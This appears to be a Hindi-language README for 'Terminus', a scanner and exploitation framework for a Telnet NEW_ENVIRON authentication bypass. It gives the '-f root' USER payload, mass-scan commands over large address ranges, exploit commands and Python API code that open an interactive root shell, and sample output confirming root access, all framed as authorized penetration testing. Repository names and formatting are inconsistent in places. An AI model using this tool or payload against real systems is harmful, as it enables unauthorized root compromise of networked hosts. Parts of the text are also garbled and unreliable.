
AsyncIO स्कैनर और CVE-2026-24061 (Telnet NEW_ENVIRON Auth Bypass) के लिए शोषण फ्रेमवर्क। इसमें उच्च-समवर्ती खोज, निष्क्रिय फिंगरप्रिंटिंग, और अधिकृत रूट शेल एस्केलेशन शामिल है।
CVE-2026-24061 Telnet NEW_ENVIRON प्रमाणीकरण बायपास और विशेषाधिकार वृद्धि भेद्यता के लिए एक सुरक्षा विश्लेषण इंजन।

Terminus एक व्यावसायिक सुरक्षा अनुसंधान उपकरण है जिसे CVE-2026-24061 के अधिकृत पेनेट्रेशन टेस्टिंग और भेद्यता मूल्यांकन के लिए डिज़ाइन किया गया है। यह गंभीर भेद्यता विरासती Telnet डेमन कार्यान्वयन को प्रभावित करती है, जिससे अप्रमाणित दूरस्थ हमलावर प्रमाणीकरण को बायपास कर रूट-स्तरीय पहुँच प्राप्त कर सकते हैं।
CVE-2026-24061 उन Telnet सेवाओं में एक रिमोट कोड एक्ज़ीक्यूशन भेद्यता है जो RFC 1572 (Telnet पर्यावरण विकल्प) का समर्थन करती हैं। यह भेद्यता NEW_ENVIRON सबनेगोशिएशन के दौरान USER पर्यावरण चर के अनुचित सैनिटाइज़ेशन का शोषण करती है:
USER=john → पासवर्ड के लिए संकेत देता हैUSER=-f root → प्रमाणीकरण बायपास करता है, रूट शेल प्रदान करता हैप्रभाव:
प्रभावित सेवाएँ:
192.168.0.0/24, 10.0.0.0/8)--verify): शोषण का प्रमाण, uid=0 रूट पहुँच की पुष्टि करता हैTerminus.handshake() - RFC 854 अनुरूप हैंडशेकTerminus.exploit() - CVE-2026-24061 पेलोड डिलीवरी--exploit फ्लैग की आवश्यकता होती हैTerminus का हृदय TerminusNegotiator क्लास है, जो प्रोटोकॉल हैंडलिंग और शोषण तर्क के बीच एक स्वच्छ पृथक्करण प्रदान करता है:```python
from terminus import TerminusNegotiator
negotiator = TerminusNegotiator()
await negotiator.handshake(target="192.168.1.100", port=23)
result = await negotiator.exploit(payload="-f root")
if result.success: print(f"Root shell acquired: {result.evidence['uid']}")
### इंजन बनाम स्क्रिप्ट दृष्टिकोण
**पारंपरिक स्क्रिप्ट** (मौजूदा उपकरण):```
Target → Raw Socket → Payload → Blind Execution → Hope for Shell
टर्मिनस इंजन:``` Target → Discovery → RFC Handshake → Passive Analysis → Risk Assessment ↓ [Optional] Verified Exploitation → Evidence Collection → Report
---
## स्थापना
### आवश्यकताएँ
- **Python 3.10+**
- **समर्थित प्लेटफ़ॉर्म:**
- Windows 10/11 (PowerShell)
- Windows + WSL2 (Kali Linux, Parrot OS, Ubuntu)
- नेटिव Linux (Kali, Parrot, Ubuntu, Debian)
- macOS (Python 3.10+ के साथ)
### त्वरित प्रारंभ (सभी प्लेटफ़ॉर्म)
#### Windows (PowerShell)```powershell
# Clone repository
git clone https://github.com/ridpath/Terrminus-CVE-2026-2406.git
# Run setup script
.\setup_env.ps1
# Activate virtual environment
.venv\Scripts\Activate.ps1
# Verify installation
terminus --version
git clone https://github.com/ridpath/Terrminus-CVE-2026-2406.git cd Terminus-CVE-2025-2406
chmod +x setup_env.sh ./setup_env.sh
source venv/bin/activate
terminus --version
#### मैन्युअल इंस्टॉलेशन (सभी प्लेटफ़ॉर्म)```bash
# Clone repository
git clone https://github.com/ridpath/Terrminus-CVE-2026-2406.git
cd Terrminus-CVE-2026-2406
# Create virtual environment
python3 -m venv venv
# Activate (Linux/macOS/WSL)
source venv/bin/activate
# Activate (Windows PowerShell)
# venv\Scripts\Activate.ps1
# Install dependencies
pip install -e .
# Verify
terminus --version
telnetlib3 - AsyncIO Telnet प्रोटोकॉल कार्यान्वयनrich - टर्मिनल UI और फ़ॉर्मेटिंग (Windows/Linux पर ANSI समर्थन)pydantic - डेटा सत्यापन और मॉडलaiofiles - एसिंक फ़ाइल I/Ojinja2 - रिपोर्ट टेम्पलेटिंगpyyaml - कॉन्फ़िगरेशन प्रबंधनpathlib - क्रॉस-प्लेटफ़ॉर्म पथ हैंडलिंग (बिल्ट-इन)नोट: सभी निर्भरताएँ शुद्ध Python हैं या उनमें क्रॉस-प्लेटफ़ॉर्म व्हील्स हैं। किसी प्लेटफ़ॉर्म-विशिष्ट संकलन की आवश्यकता नहीं है।
तेज़ कमांड प्रविष्टि के लिए टैब कम्प्लीशन सक्षम करें:
_TERMINUS_COMPLETE=bash_source terminus > ~/.terminus-complete.bash echo 'source ~/.terminus-complete.bash' >> ~/.bashrc source ~/.bashrc
### Zsh```bash
_TERMINUS_COMPLETE=zsh_source terminus > ~/.terminus-complete.zsh
echo 'source ~/.terminus-complete.zsh' >> ~/.zshrc
source ~/.zshrc
_TERMINUS_COMPLETE=fish_source terminus > ~/.config/fish/completions/terminus.fish
### PowerShell```powershell
# Add to $PROFILE
_TERMINUS_COMPLETE=powershell_source terminus | Out-String | Invoke-Expression
इसे आज़माएं:```bash terminus # Shows: scan, exploit, version terminus scan - # Shows: -t, -f, -p, --verify, etc.
---
## उपयोग
### स्कैनिंग मोड
#### एकल लक्ष्य स्कैन```bash
terminus scan -t 192.168.1.100
terminus scan -t 192.168.1.0/24
#### फ़ाइल-आधारित बैच स्कैन```bash
# targets.txt contains one IP/CIDR per line
terminus scan -f targets.txt --threads 500
terminus scan -t 10.0.0.0/8 --threads 1000 --rate-limit 200
### डिटेक्शन मोड
#### पैसिव डिटेक्शन (डिफ़ॉल्ट - सुरक्षित)```bash
terminus scan -t target.com --passive-only
terminus scan -t target.com --aggressive
#### सक्रिय सत्यापन मोड (Proof-of-Exploit)```bash
terminus scan -t 192.168.1.100 --verify
संस्करण जांचें:```powershell PS C:\terminus> terminus --version Terminus v1.0.0 CVE-2026-24061 Telnet NEW_ENVIRON Scanner & Exploitation Framework Signatures database: C:\terminus\signatures.db
**निष्क्रिय स्कैन (डिफ़ॉल्ट - रूढ़िवादी जोखिम मूल्यांकन):**```powershell
PS C:\terminus> python -m terminus scan -t 172.17.45.122 -p 2323
================================================================
TERMINUS
CVE-2026-24061 Scanner & Exploitation Framework
================================================================
Parsing 1 targets...
Found 1 valid targets
Scanning 1 targets... ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% (1/1) Vulnerable: 0 0:00:00
╭────── Scan Summary ──────╮
│ CVE: CVE-2026-24061 │
│ Total Targets: 1 │
│ Scanned: 1 │
│ Failed: 0 │
│ Timeouts: 0 │
│ │
│ Vulnerability Breakdown: │
│ Critical: 0 │
│ High: 0 │
│ Medium: 0 │
│ Low: 1 │
│ Info: 0 │
│ │
│ Duration: 3.53s │
│ Avg Scan Time: 3522.22ms │
│ │
╰──────────────────────────╯
Terminus - CVE-2026-24061 Scan Results
╭───────────────┬──────┬───────────┬──────┬─────────┬─────────┬─────────────┬──────────┬───────────────╮
│ Target │ Port │ Status │ Risk │ Daemon │ Version │ NEW_ENVIRON │ Verified │ Duration (ms) │
├───────────────┼──────┼───────────┼──────┼─────────┼─────────┼─────────────┼──────────┼───────────────┤
│ 172.17.45.122 │ 2323 │ completed │ Low │ unknown │ Unknown │ YES │ - │ 3522.22 │
╰───────────────┴──────┴───────────┴──────┴─────────┴─────────┴─────────────┴──────────┴───────────────╯
No vulnerable targets found
--verify के साथ सक्रिय सत्यापन (प्रूफ-ऑफ-एक्सप्लॉइट):```powershell PS C:\terminus> python -m terminus scan -t 172.17.45.122 -p 2323 --verify
Parsing 1 targets... Found 1 valid targets
Scanning 1 targets... ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% (1/1) Vulnerable: 1 0:00:00
╭────── Scan Summary ──────╮ │ CVE: CVE-2026-24061 │ │ Total Targets: 1 │ │ Scanned: 1 │ │ Failed: 0 │ │ Timeouts: 0 │ │ │ │ Vulnerability Breakdown: │ │ Critical: 1 │ │ High: 0 │ │ Medium: 0 │ │ Low: 0 │ │ Info: 0 │ │ │ │ Duration: 8.04s │ │ Avg Scan Time: 8029.55ms │ │ │ ╰──────────────────────────╯
Terminus - CVE-2026-24061 Scan Results
╭───────────────┬──────┬───────────┬──────────┬─────────┬─────────┬─────────────┬──────────┬───────────────╮ │ Target │ Port │ Status │ Risk │ Daemon │ Version │ NEW_ENVIRON │ Verified │ Duration (ms) │ ├───────────────┼──────┼───────────┼──────────┼─────────┼─────────┼─────────────┼──────────┼───────────────┤ │ 172.17.45.122 │ 2323 │ completed │ Critical │ unknown │ Unknown │ YES │ ROOT │ 8029.55 │ ╰───────────────┴──────┴───────────┴──────────┴─────────┴─────────┴─────────────┴──────────┴───────────────╯
Found 1 vulnerable targets!
**इंटरैक्टिव शोषण:**```powershell
PS C:terminus> python -m terminus exploit -t 172.17.45.122 -p 2323 --yes
================================================================
TERMINUS
CVE-2026-24061 Scanner & Exploitation Framework
================================================================
Attempting exploitation of 172.17.45.122:2323...
Payload: -f root
CVE-2026-24061 exploitation attempt initiated with payload: -f root
CVE-2026-24061 exploitation SUCCESSFUL - root access obtained
[*] CVE-2026-24061 Interactive Shell Started
[*] Type 'exit' or press Ctrl+C to quit
whoami
root
┌──[root@parrot]─[~]
└──╼ #
मुख्य अवलोकन:
यह क्या करता है:
-f root पेलोड के साथ वास्तविक शोषण का प्रयास करता हैuid=0 की जाँच करके रूट एक्सेस की पुष्टि करता हैउपयोग के मामले:
उदाहरण आउटपुट:``` Target Port Status Daemon Risk Verified 192.168.1.100 23 VULNERABLE inetutils-telnetd CRITICAL ROOT ACCESS 192.168.1.101 23 VULNERABLE netkit-telnetd HIGH Not tested 192.168.1.102 23 SAFE OpenBSD-telnetd LOW N/A
**बैच सत्यापन:**```bash
terminus scan -f targets.txt --verify -o json -w verified_results.json
नोट: सक्रिय सत्यापन शोषण का प्रयास करता है। केवल उचित प्राधिकरण के साथ उपयोग करें।
terminus scan -t 192.168.1.0/24 -o json > results.json
#### HTML रिपोर्ट```bash
terminus scan -f targets.txt -o html -w report.html
terminus scan -t 10.0.0.0/24 -o csv > vulnerabilities.csv
### एक्सप्लॉइटेशन (केवल अधिकृत उपयोग के लिए)
#### इंटरैक्टिव शेल```bash
terminus exploit -t 192.168.1.100
# Requires confirmation prompt
# Grants root shell on vulnerable target
terminus exploit -t 192.168.1.100 -c "id"
#### कस्टम पेलोड```bash
terminus exploit -t 192.168.1.100 --payload "-f admin"
terminus update-signatures
#### पिछले परिणाम सत्यापित करें```bash
terminus verify -f results.json
terminus version
---
## परीक्षण वातावरण सेटअप
### रेड टीम के लिए: क्रॉस-प्लेटफ़ॉर्म डिप्लॉयमेंट
**Terminus को पोर्टेबल डिप्लॉयमेंट के लिए डिज़ाइन किया गया है** - निर्देशिका को किसी भी Windows/Linux सिस्टम पर कॉपी करें और बिना इंस्टॉलेशन के चलाएं:```bash
# Copy terminus directory to target system
# No hardcoded paths - everything is relative
# Run directly (no installation needed)
cd terminus
python3 -m terminus scan -t 192.168.1.0/24
# All output stays in project directory:
# - Logs: ./logs/terminus.log
# - Reports: ./reports/
# - Config: ./config.yaml
Windows Red Team वर्कस्टेशन के लिए अनुशंसित - कमजोर परीक्षण सेवाओं को तैनात करने के लिए पृथक Linux वातावरण:
wsl --install
wsl --install -d kali-linux
wsl -l -v
#### WSL2 के अंदर (Kali/Parrot)```bash
# Update system
sudo apt update && sudo apt upgrade -y
# Install Terminus dependencies
sudo apt install python3 python3-pip python3-venv
# Install testing tools
sudo apt install netkit-telnetd telnetd wireshark tcpdump
# Clone and setup Terminus
git clone https://github.com/ridpath/Terrminus-CVE-2026-2406
cd Terminusb-CVE-2026-2406
./setup_env.sh
source venv/bin/activate
चेतावनी: केवल पृथक लैब वातावरण में। उत्पादन प्रणालियों पर कभी नहीं।```bash
sudo apt install netkit-telnetd=0.17-*
sudo systemctl restart inetd
### क्रॉस-प्लेटफ़ॉर्म परीक्षण मैट्रिक्स
अपनी रेड टीम द्वारा उपयोग किए जाने वाले सभी प्लेटफ़ॉर्म पर Terminus का परीक्षण करें:
| प्लेटफ़ॉर्म | इंस्टॉलेशन | स्कैनिंग | एक्सप्लॉइटेशन |
|----------|-------------|----------|--------------|
| Windows 10/11 (PowerShell) | हाँ | हाँ | हाँ |
| WSL2 - Kali Linux | हाँ | हाँ | हाँ |
| WSL2 - Parrot OS | हाँ | हाँ | हाँ |
| WSL2 - Ubuntu | हाँ | हाँ | हाँ |
| Native Kali Linux | हाँ | हाँ | हाँ |
| Native Parrot OS | हाँ | हाँ | हाँ |
| macOS | हाँ | हाँ | हाँ |
---
## API संदर्भ
### Python एकीकरण```python
import asyncio
from terminus import TerminusScanner, TerminusExploiter, TerminusNegotiator
from terminus.reporting.models import RiskScore
async def scan_network():
# High-level scanner
async with TerminusScanner() as scanner:
async for result in scanner.scan_targets(["192.168.1.0/24"]):
if result.risk_score == RiskScore.CRITICAL:
print(f"CRITICAL: {result.target}")
print(f" Daemon: {result.daemon_type} {result.version}")
print(f" Confidence: {result.vulnerability_confidence:.2%}")
async def exploit_target():
# Direct engine usage
negotiator = TerminusNegotiator()
# Handshake
success = await negotiator.handshake(target="192.168.1.100", port=23)
if not success:
print("Handshake failed")
return
# Exploit
result = await negotiator.exploit(payload="-f root")
if result.success:
print(f"Root access obtained")
print(f"Evidence: {result.evidence}")
# Run
asyncio.run(scan_network())
यह टूल केवल निम्नलिखित के लिए है:
अनधिकृत उपयोग अवैध और अनैतिक है।
--exploit फ्लैग आवश्यक हैयदि आप Terminus का उपयोग करके कमजोर सिस्टम खोजते हैं:
सभी पथ प्रोजेक्ट रूट के सापेक्ष हैं - बिना संशोधन के Windows, Linux और WSL पर काम करते हैं:```yaml
scanner: default_port: 23 connect_timeout: 3.0 handshake_timeout: 5.0 max_concurrent: 1000 rate_limit: 100 # connections/second
detection: passive_only: true # Safe mode by default banner_timeout: 2.0 heuristic_checks: true
signatures_db: "./signatures.db"
exploit: require_authorization: true default_payload: "-f root" evidence_collection: true interactive_shell: true
reporting: default_format: "terminal" include_safe_targets: false verbosity: "normal"
output_dir: "./reports"
logging: level: "INFO"
file: "./logs/terminus.log" format: "json" console_enabled: true